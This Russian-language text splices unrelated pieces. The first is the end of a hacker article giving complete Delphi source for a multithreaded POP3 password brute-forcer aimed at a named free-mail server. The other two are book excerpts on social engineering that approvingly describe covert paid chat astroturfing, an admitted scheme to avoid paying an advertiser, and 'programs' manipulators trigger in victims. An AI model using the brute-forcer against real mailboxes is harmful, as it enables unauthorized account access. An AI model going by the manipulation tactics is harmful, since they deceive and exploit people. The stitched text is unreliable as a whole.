сервак на предмет установленного почтового сервиса и поэкспериментировав с купленным мылом, я понял, почему некоторые жаловались на то, что по 5-ти часовой карточке у них больше 2-ух часов не работаешь и кто-то периодически читает у этого прова все мыло. Но это тема отдельного разговора. Кстати, нужный мне пароль оказался qwerty . Обычно, первое слово в большинстве словарей. Рассмотрим способы защиты службы борьбы с амнезией. Первый - временная защита (кстати, на mail.xakep.ru я ее не обнаружил, хотя может не там смотрел). Второе - указывать любимое блюдо не Пиво и рост - не 215 . Таким образом, в большинстве случаев способ Забыл пароль не действует. Теперь рассмотрим вариант, при котором человек не должен догадываться, что его мыло читают, т.е. даже подбор Забыл пароль не катит. Перейдем непосредственно к исследованиям и кодингу. Я не буду рассматривать написание брутфорса на перл для работы на удаленном сервере - это есть на www.xakep.ru. Рассмотрим написание брутфорса на Delphi, с использованием функций WinAPI для работы с сокетом. Переписать на перл, си или асм потом проблем нет никаких - оно все отличается только синтаксисом вызова функций. Также потребуется какой-нибудь telnet-клиент, port-mapper или tcp-logger для исследования ответов сервера. POP3. 110 порт. Интересующие нас команды - user и pass . Предположим, что надо подобрать пароль на freemail.ukr.net у пользователя dndanil (это мой - специально для экспериментов). Ломанемся по телнету на freemail.ukr.net:110 и введем user dndanil . Потом pass password . Посмотрим ответы. Если после оценки скорости желание не отпало, то надо написать прогу, которая будет коннектится к серваку и перебирать пароли с отслеживанием ошибок. Прогу будем писать с учетом продвинутых технологий при создании различных сканеров - многопоточность, т.е. перебирать пароли будут сразу несколько процессов. Так, вроде, быстрей. Для этого надо ввести класс, описывающий наш процесс. Кол-во одновременно запущенных процессов зависит от железа и скорости соединения с инетом. Для перебора будем использовать файл с паролями, который загрузим в TStringList (список строк). Итак, создадим для наглядности окно и влепим туда кнопку Hack it :-) и ProgressBar с Win32. Вот исходники с комментариями брутфорсера для POP3-сервера: unit Unit1; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ComCtrls, StdCtrls, WinSock; type TForm1 = class(TForm) Button1: TButton; ProgressBar1: TProgressBar; procedure Button1Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; // Описание процесса type TScan = class(TThread) sock2 : TSocket; addr:TSockAddrIn; WSAData : TWSAData; private procedure CScan; protected procedure Execute; override; end; var Form1: TForm1; // Массив процессов Sock : array[1..255] of TScan; Rez : boolean = false; // Кол-во запущенных процессов на данный момент I0 : Integer; // Номер текущего пароля I : Integer; // TStringList с паролями PassList : TStringList; const FilePass = 'pass.txt'; // Файл с паролями в каталоге проги ProcCount = 10; // кол-во процессов POP3serv = '212.42.64.13'; // POP3 server (отпингованый) User = 'dndanil'; implementation {$R *.DFM} procedure TForm1.FormCreate(Sender: TObject); begin PassList:=TStringList.Create; end; // Запуск / Остановка procedure TForm1.Button1Click(Sender: TObject); begin if Rez then Rez:=false else begin // Открытие и загрузка файла паролей try PassList.Clear; PassList.LoadFromFile(FilePass); except end; if PassList.Count<=0 then begin Application.MessageBox('Файл паролей не найден или его нельзя использовать','ERROR',mb_Ok); exit; end; Form1.Button1.Caption:='Stop'; Form1.ProgressBar1.Position:=0; // Кол-во паролей Form1.ProgressBar1.Max:=PassList.Count; Application.ProcessMessages; I:=0; I0:=1; Rez:=true; // Запустить все процессы while true do begin Sock[i0]:=TScan.Create(false); inc(I0); // Подсчитать их кол-во //Выйти если больше указанного, или стоп, или подобрали if (I0>ProcCount)or(not Rez) then break; end; end; end; // Проца инициализации процесса procedure TScan.Execute; begin try // Запуск цикла while true do begin CScan; //Выход, если подобрали или закончился словарь if (not Rez)or(I>=PassList.Count) then break; end; except end; dec(I0); try Terminate; except end; //Если все процессы прерваны - if I0<=1 then begin Form1.Button1.Caption:='Hack it'; Rez:=false; Application.ProcessMessages; end; end; //Проца сканирования procedure TScan.CScan; var iaddr, x, I2 : Integer; Buf : array [1..255] of Char; //Отправка procedure sender(str:string); var I1 :integer; begin for I1:=1 to Length(str) do if send(sock2, str[i1] , 1, 0) = SOCKET_ERROR then exit; end; begin I2:=I; inc(I); Form1.ProgressBar1.Position:=I2+1; Application.ProcessMessages; try // Инициализация сокета WSAStartUp(257, WSAData); sock2:=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); if sock2=INVALID_SOCKET then begin try closesocket(sock2); except end; exit; end; //Адрес сервака iaddr := inet_addr(PChar(POP3serv)); if iaddr <=0 then begin try closesocket(sock2); except end; exit; end; addr.sin_family := AF_INET; // Порт сервака addr.sin_port := htons(110); addr.sin_addr.S_addr:=iaddr; if (connect(sock2, addr, sizeof(addr))) >0 then begin try closesocket(sock2); except end; exit; end; //Получение при соединении x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // user user sender('user '+User+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // pass password sender('pass '+PassList.Strings[i2]+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); //Если подобралось if (x>3)and(buf[1]='+') then begin Rez:=false; Application.MessageBox(PChar('Pass = '+PassList.Strings[i2]),'ENJOY',mb_Ok); exit; end; try closesocket(sock2); except end; except end; end; end. Адрес сервака перед использованием надо отпинговать (ping -a freemail.ukr.net) и ввести IP. Кол-во процессов подбирается исходя из железа. Это рабочий скелет брутфорсера, хоть и написан за пару часов. При проверке, я создал файл-словарь, размером 1000 паролей и 666-ым шел мой настоящий пароль. При одном процессе я задолбался ждать. При кол-ве процессов 255, уже через 15 минут (на диалап), мне высветился мой пароль. На шелле, аналогичная конструкция на перл, заняла примерно столько же времени. Но это на 666-ом пароле, а на 1000000-ом я бы ждал очень долго. Поэтому этот способ обладает очень призрачными шансами что-либо подобрать и годится только для очень простых паролей. P.S. Статья и программа предоставлена в целях обучения и вся ответственность за использование ложится на твои хилые плечи.
-
Музыкальный танк Продолжая разговор про управление толпой, рассмотрим такой интересный факт. Толпой, оказывается, можно управлять с помощью музыки. Причем для разных видов толпы музыка должна быть разной. К примеру, известно, что панику провоцируют звуки высокой частоты (кто не слышал женского визга, так разрушающе действующего на психику). А для достижения обратного эффекта необходимы звуки более низкие, поэтому, как правило, когда усмиряют толпу, из динамиков слышится мужской баритон. В 70-х годах в одной из африканских стран придумали так называемый музыкальный танк, который представлял собой обычный бронетранспортер и "стрелял музыкой" из своих внушительных динамиков. Причем музыка эта была ритмичная. Толпа "ловилась на ритм" и постепенно начинала двигаться в такт ритму. Тем самым энергия вместо агрессии уходила в пляску. Правда, по своей воле "соскочить с ритма" практически никому не удается. Известно множество случаев, когда люди в толпе, двигаясь под звуки ритмичной музыки, доводили себя до изнеможения. Примечание Вспомним первый пример, в котором после слова "Пожар!" начинается массовая паника. Известен случай, когда двум психологам, знакомым с методами управления толпой, в аналогичном случае удалось такую панику прекратить. Когда в зале кинотеатра раздались крики "Пожар" и толпа обезумевших людей бросилась к единственному выходу, психологи не растерялись и стали …громко хлопать в ладоши и громко выкрикивать ритмичные звуки: "Раз! Раз! Раз-два-три! Раз! Раз! Раз-два-три!". И люди стали ритмично пританцовывать, паника была прекращена. Интернет-реклама оператора сотовой связи В 2001 году в Москве появился новый оператор сотовой связи. Что само по себе совершенно не удивительно. Удивительным было другое: несмотря на то, что данный оператор на первый взгляд практически не вел никакой рекламной кампании, через пару месяцев о его появлении в курсе была уже вся Москва и Подмосковье. Оказалось, что реклама все-таки проводилась, и вели ее всего несколько человек. Они "всего-навсего" сидели в различных чатах и форумах, включаясь в любой разговор, касающийся мобильной связи. Причем действовали они очень мудро, говоря о достоинствах нового "ОпСоСа" так, что их виртуальные собеседники ни сном, ни духом не ведали, что их "виртуальные визави" получают за это деньги, и вообще все это не что иное, как рекламная кампания. Говорят, что вся эта акция была проведена усилиями всего пяти человек. Вообще известно, что самая действенная реклама — это та реклама, когда товар рекламируют друзья и знакомые. К примеру, 60% покупателей одной из моделей КПК (карманного персонального компьютера) сказали при опросе, что купили эту модель, потому что так посоветовали их знакомые и друзья. Примерно такие же данные имеют различные туроператоры, согласно которым 45% людей выбирают турфирму на основании того, что о ней хорошо отзывались их знакомые. Как я понимаю, в приведенном примере делался упор в том числе и на этот фактор, что на самом деле не очень сложно. Достаточно стать "своим" в каком-нибудь чате, и посоветовать потом что-то купить или, как в данном случае, сказать, что "а по мне более выгоден вот этот новый сотовый оператор". По нашей прикидке до 30% посетителей чата могут на это "купиться". Вообще, должен сказать, что цифры эти весьма серьезные. И по их значению, и по тем выводам, которые из них вытекают. Из них, в частности, следует то, что традиционная реклама, стоящая, вообще говоря, немалых денег, эти деньги, скажем так, не очень оправдывает. Примечание В чем мы, увы, не раз убеждались на собственном опыте. К примеру, организовав в своем городе Скорую Компьютерную Помощь, мы поначалу, как честные люди, разместили нашу рекламу на автобиллоборде (кто не знает, — это такая газель, у которой вместо кузова рекламный щит). Причем добились того, что этот "биллоборд" стоял в самом людном месте города: прямо рядом с выходом из центрального вокзала. Так вот, за месяц его стояния только три человека, обратившиеся к нам, сказали, что узнали о нас от этого "борда". И таких примеров только на примере своей деятельности мы можем привести немало: почти все традиционные виды рекламы, которые мы использовали в нашей деятельности — это впустую "вгроханные" деньги. И такой точки зрения сейчас придерживается все больше руководителей. Отчасти это происходит, конечно, и по вине большинства самих рекламщиков, которые форменно обнаглели, действуя по принципу "Дайте деньги, гарантий — никаких". Происходит это потому, что рекламный рынок, как и любой другой рынок, на котором крутятся серьезные деньги, уже поделен. И влезть в него весьма не просто. Должен сказать, что, услышав однажды примерно такую фразу, мы настолько обозлились, что позволили себе использовать свои знания, скажем так, в мошеннических целях. В результате чего реклама провисела 4 месяца, а денег за нее мы не заплатили ни копейки. А поскольку юридически по всем статьям мы были правы, незадачливому рекламодателю осталось только развести руками. …Поэтому мы считаем, что постепенно многие будут обращать внимание на рекламу с помощью "социопрограммистских штучек", и понемногу будут отходить от рекламы традиционной. Что нас очень радует потому, что для рекламы с помощью методов социального программирования, в первую очередь, нужен ум, а не деньги и блат, благодаря которым одной компанией в городе скупаются все фасады зданий этого города.
-
Изучая психологию, приходишь к выводу, что мы действительно большую часть времени живем в мире программ, лишь иногда отключая "автопилот", и переходя на "ручное управление". Давно известно, что люди, как правило, с большой неохотой что-то анализируют и осмысливают, предпочитая в большинстве случаев действовать на "автомате". И реагируют на ситуации, как правило, стереотипно. Мыслительный же анализ подключается только тогда, когда люди этого хотят. Таким образом, если человек захочет помыслить, он помыслит, а во всех других случаях среагирует стереотипно. Захотеть подумать человек может, к примеру, тогда, когда вариант действия на автопилоте не проходит, скажем, потому, что может привести к гибели человека. Но самое поразительное, что даже в этом случае люди не всегда берут управление в свои руки. Известна масса примеров, когда команда судна, видя и понимая, что капитан совершает гибельную ошибку, все равно не вмешалась в ситуацию и не взяла управление в свои руки. Не собой, не кораблем. И судно гибло. Если бы они отключили свой "автопилот", они перестали бы думать стереотипно, вмешались бы в действия капитана, и трагедии бы не произошло. Как мы увидим дальше, эти люди действовали в рамках программы "Поклонение авторитету", которая оказалась даже сильнее страха потерять свою жизнь. Основной метод действия социальных хакеров Примечание Я был свидетелем потрясающей истории. Представьте себе: два водителя инструктора автошколы поехали на автомобиле автошколы. Таким образом, у второго водителя, который сидел на пассажирском сиденье, тоже была педаль тормоза. Первый инструктор был очень титулованный, этакий "инструктор инструкторов", или как говорят на флоте "капитан-наставник". И что вы думаете? Они врезались в дерево на какой-то проселочной дороге. Выжили, но получили сильные повреждения. А водитель по какой-то причине просто отключился, и направил машину в дерево. Бывает такое, даже с инструкторами. Пикантность ситуации в том, что второй водитель, сидя на пассажирском сиденье, ничего не предпринял, хотя прекрасно понимал, что происходит и чем все закончится. Он даже инстинктивно не нажал педаль тормоза. Когда я его спросил, почему он так сделал, он пожал плечами и ответил: "А черт его знает, я считал, что он знает, что делает". Вот она, сила программы. К счастью, все-таки некоторые люди могут взять управление ситуацией в свои руки, и трагедии удается избежать. В главе 1 мы рассмотрели схему Шейнова, показав, что она работает применительно к социальной инженерии. Но в этой схеме мы рассмотрели частные случаи манипулирования человеком, т. е. мы увидели, что нужно сделать в том случае, когда человек уже готов к манипулированию, и рассмотрели в первых двух главах различные примеры манипулирования. Теперь же, рассмотрев некоторые основы социального программирования, мы можем ответить на более общий вопрос: а почему люди готовы к манипулированию и как их к этому подготавливают? На этот вопрос несложно ответить, зная о том, что люди действуют в рамках заложенных в их бортовой компьютер программ. Что делает социальный хакер? Он просто переключает теми или иными способами человека на выполнение той программы, которая ему нужна в данный момент. К примеру, на "программу уступчивости". Зная сигналы, по которым происходит это переключение, это сделать даже не очень сложно. Вот примерно так люди и программируются. Таким образом, по сути, социальный хакер подходит к человеку и говорит ему "кри-кри", что служит для человека сигналом к переключению на определенную программу. Это, конечно, общее рассуждение, далее мы рассмотрим более конкретные примеры. Примечание Помните, в главе 1 мы говорили о людях, которые, как в примерах К. Митника, не могли отказать ни одному человеку в его просьбе. В том числе и социальным хакерам на их просьбы, весьма небезобидные. Говоря на языке социального программирования, эти люди жили по программе уступчивости или их к выполнению этой программы подводили. Самое интересное в том, что большинство из нас, за исключением специалистов, практически ничего не знает об "автоматических моделях нашего поведения". А ведь именно эти модели делают нас крайне уязвимыми по отношению к той группе людей, которых мы называем социальными хакерами, которые прекрасно осведомлены о том, как эти модели работают, и что нужно сделать, чтобы переключить человека с одной автоматической модели поведения на другую. А теперь снова сделаем небольшой экскурс в зоологию и увидим, что социальные хакеры существуют не только среди людей, а и среди животных. Известно два близких рода жуков, причем самки одного рода крайне кровожадны, а в другом роде и самцы и самки весьма миролюбивы. Естественно, что самцы миролюбивого рода предпочитают избегать самок кровожадного рода, и этим самцам и в страшном сне не привидится, что они будут спариваться с этими кровожадными самками. И что вы думаете? Кровожадные самки сумели разгадать и воспроизвести способ, которым самки миролюбивого рода приглашают своих самцов к брачным играм. И стали воспроизводить эти способы ухаживания. У самцов миролюбивого рода, не заметивших подлога, включалась "программа ухаживания" и они летели в смертоносные объятия кровожадных самок. Превосходит же всех по части эксплуатации так называемый "жук-бродяга", который с помощью разнообразных ухищрений заставляет муравьев считать, что он — тоже муравей. И этому "социальному хакеру" муравьи дают приют в своих жилищах, а жук еще вдобавок отвечает на это черной неблагодарностью: поедает яйца муравьев, а иногда и их самих. Интересно, что жук-бродяга до такой степени программирует муравьев, что они на него никогда не нападают, несмотря на то, что он может сожрать весь муравейник. Вернемся к людям. Известен случай, когда группу испытуемых молодых людей подвергли воздействию химического препарата, имитирующего хорошие вагинальные запахи (во избежание дурных последствий название препарата приводить не буду). Так вот после этого молодые люди давали очень хорошие характеристики тем женщинам, на которых без воздействия препарата даже и не смотрели. Программу "уступки" мы уже рассмотрели, теперь рассмотрим еще несколько стандартных программ, по которым мы действуем. Примечание Конечно, этот список не будет полным, т. к. для того, чтобы рассмотреть все известные на данный момент программы, нужно только по ним писать отдельную книгу. Программа "взаимопомощь" Суть этой программы в том, что мы стремимся отплатить добром тем людям, которые нам сделали какое-то добро. Стремление выполнить эту программу зачастую превышает все доводы рассудка. Приведу простой пример о том, как действовал один угонщик машин. Он не спеша ехал по трассе и останавливался, чтобы помочь тем, кто в этой помощи нуждался. К примеру, у одной девушки спустило колесо, и он помог ей его поменять. Благодарная девушка естественно сказала слова благодарности и "что если вам вдруг потребуется помощь, я всегда к вашим услугам". Помощь потребовалась через два месяца, когда этот "благородный человек" попросил ее одолжить ему ее машину. И — одолжила! Потому что была запущена программа, предписывающая ей оказать ответную помощь этому человеку. Одолжила навсегда. Примечание Этот случай произошел несколько лет назад. Сейчас в России именно данная схема невозможна в связи с новыми правилами автострахования. Аналогичным способом пользуются и другие мошенники. Программа социального подражательства Примечание Эту программу еще называют программой "социальной оглядки", а известный специалист в области психологии влияния Р. Чалдини называет ее "принципом социального доказательства". Помните, мы ранее в этой главе рассматривали пример про "соляной кризис"? Это как раз один из примеров действия программы социального подражательства. Из других примеров, рассмотренных в разных главах этой книги, можно привести так называемую циркулярную реакцию в толпе (см. главу 8) и эффект Вертера (см. главу 6). Программа социального подражательства — мощнейшее оружие влияния социальных хакеров на других людей. Суть этой программы в том, что человек определяет, какие поступки являются правильными, определяя, какие поступки считают правильными другие люди. Таким образом, мы считаем свое поведение в той или иной ситуации правильным, если видим, что другие люди делают точно так же, и, соответственно, неправильным, если видим, что так как мы никто не делает. Примечание Естественно, нельзя считать, что если мы действуем в рамках какой-то программы, то это плохо. В любой программе есть свои плюсы и свои минусы. Вернее, плюсы-то у каждой программы разные, а вот минус общий на всех. И состоит этот минус в том, что, т. к. большую часть своего времени человек проводит "на автопилоте", действуя в рамках тех или иных программ, он становится крайне удобной мишенью социальных хакеров. Теперь рассмотрим различные примеры действия программы социального подражательства. Начнем со всем известных. КлакерыКлакеры — это хлопальщики, специально приглашенные и замаскированные под обычных гостей и зрителей люди, которые в нужное время должны подавать всем зрителям пример, хлопать или смеяться, в общем, задавать необходимую реакцию зрителей. Люди, видя, что другие хлопают или смеются, тоже начинают делать то же самое, поскольку действует программа социального подражательства. Формирование очередиНа основе программы социального подражательства работает один очень простой, но действенный рекламный ход: для того чтобы товар лучше покупался, нужно сформировать около него очередь покупателей. Ведь люди как думают: "Ага. Очередь? Значит вещь стоящая". Пробки на трассеНедавно, едя на машине из Пскова в Нижний Новгород, попали под Ногинском в жуткую пробку — за 5 часов проехали 30 км. Каково же было наше удивление, когда оказалось, что причин для пробки совершенно не было: мы то думали, впереди какая-то жуткая авария или что-то в этом роде, а впереди пробка просто кончилась и началась пустая трасса. А если вспомнить про программу социального подражательства, то удивляться то, оказывается, и нечему. Потому что очень большое количество пробок формируется "на пустом месте", из-за пары-тройки невыдержанных водителей. Допустим на трассе случился какой-то совершенно небольшой затор, вследствие чего движение слегка замедлилось. Ну поворачивал кто-то, чтобы съехать с основной магистрали, или гаишник кого-то остановил (как было в нашем случае). Те водители, которые сзади и не видят с чем связано замедление, начинают думать, что впереди какая-то авария. Особо невыдержанные из тех, кто так думает, начинают метаться по всей трассе, вылезать на полосу встречного движения, и вот именно из-за них и получается пробка. Потому что на них начинают смотреть другие водители, и уже не два водителя, а пять начинают метаться по трассе. Потом десять, пятнадцать, пятьдесят. И пошел лавинообразный эффект. Сработала программа социального подражательства. А потом получается пробка, т. к. всем выехавшим с трассы на полосу встречного движения или на обочину нужно вернуться на трассу, и они начинают истерично моргать поворотниками, чтобы их "впустили". И по такому принципу небольшое замедление движения превращается в "мертвую пробку". Примечание Еще немного о том, как из-за программы социального подражательства возникают аварии на трассе. Представьте себе, что два водителя одновременно вышли на полосу встречного движения и пошли на обгон. Казалось бы, ничего страшного, если бы не одно но. В этом случае может сработать программа социального подражательства у третьего и четвертого водителей, которые тоже решат пойти на обгон с выездом на полосу встречного движения. А теперь подумайте, что видят и как рассуждают пятый, шестой и все остальные водители. Они видят, что сразу четыре машины, мигая поворотниками, вышли на полосу встречного движения. Значит, впереди какое-то препятствие, которое нужно объезжать! И вот уже почти все водители выезжают на полосу встречного движения… А тут и до аварии недалеко.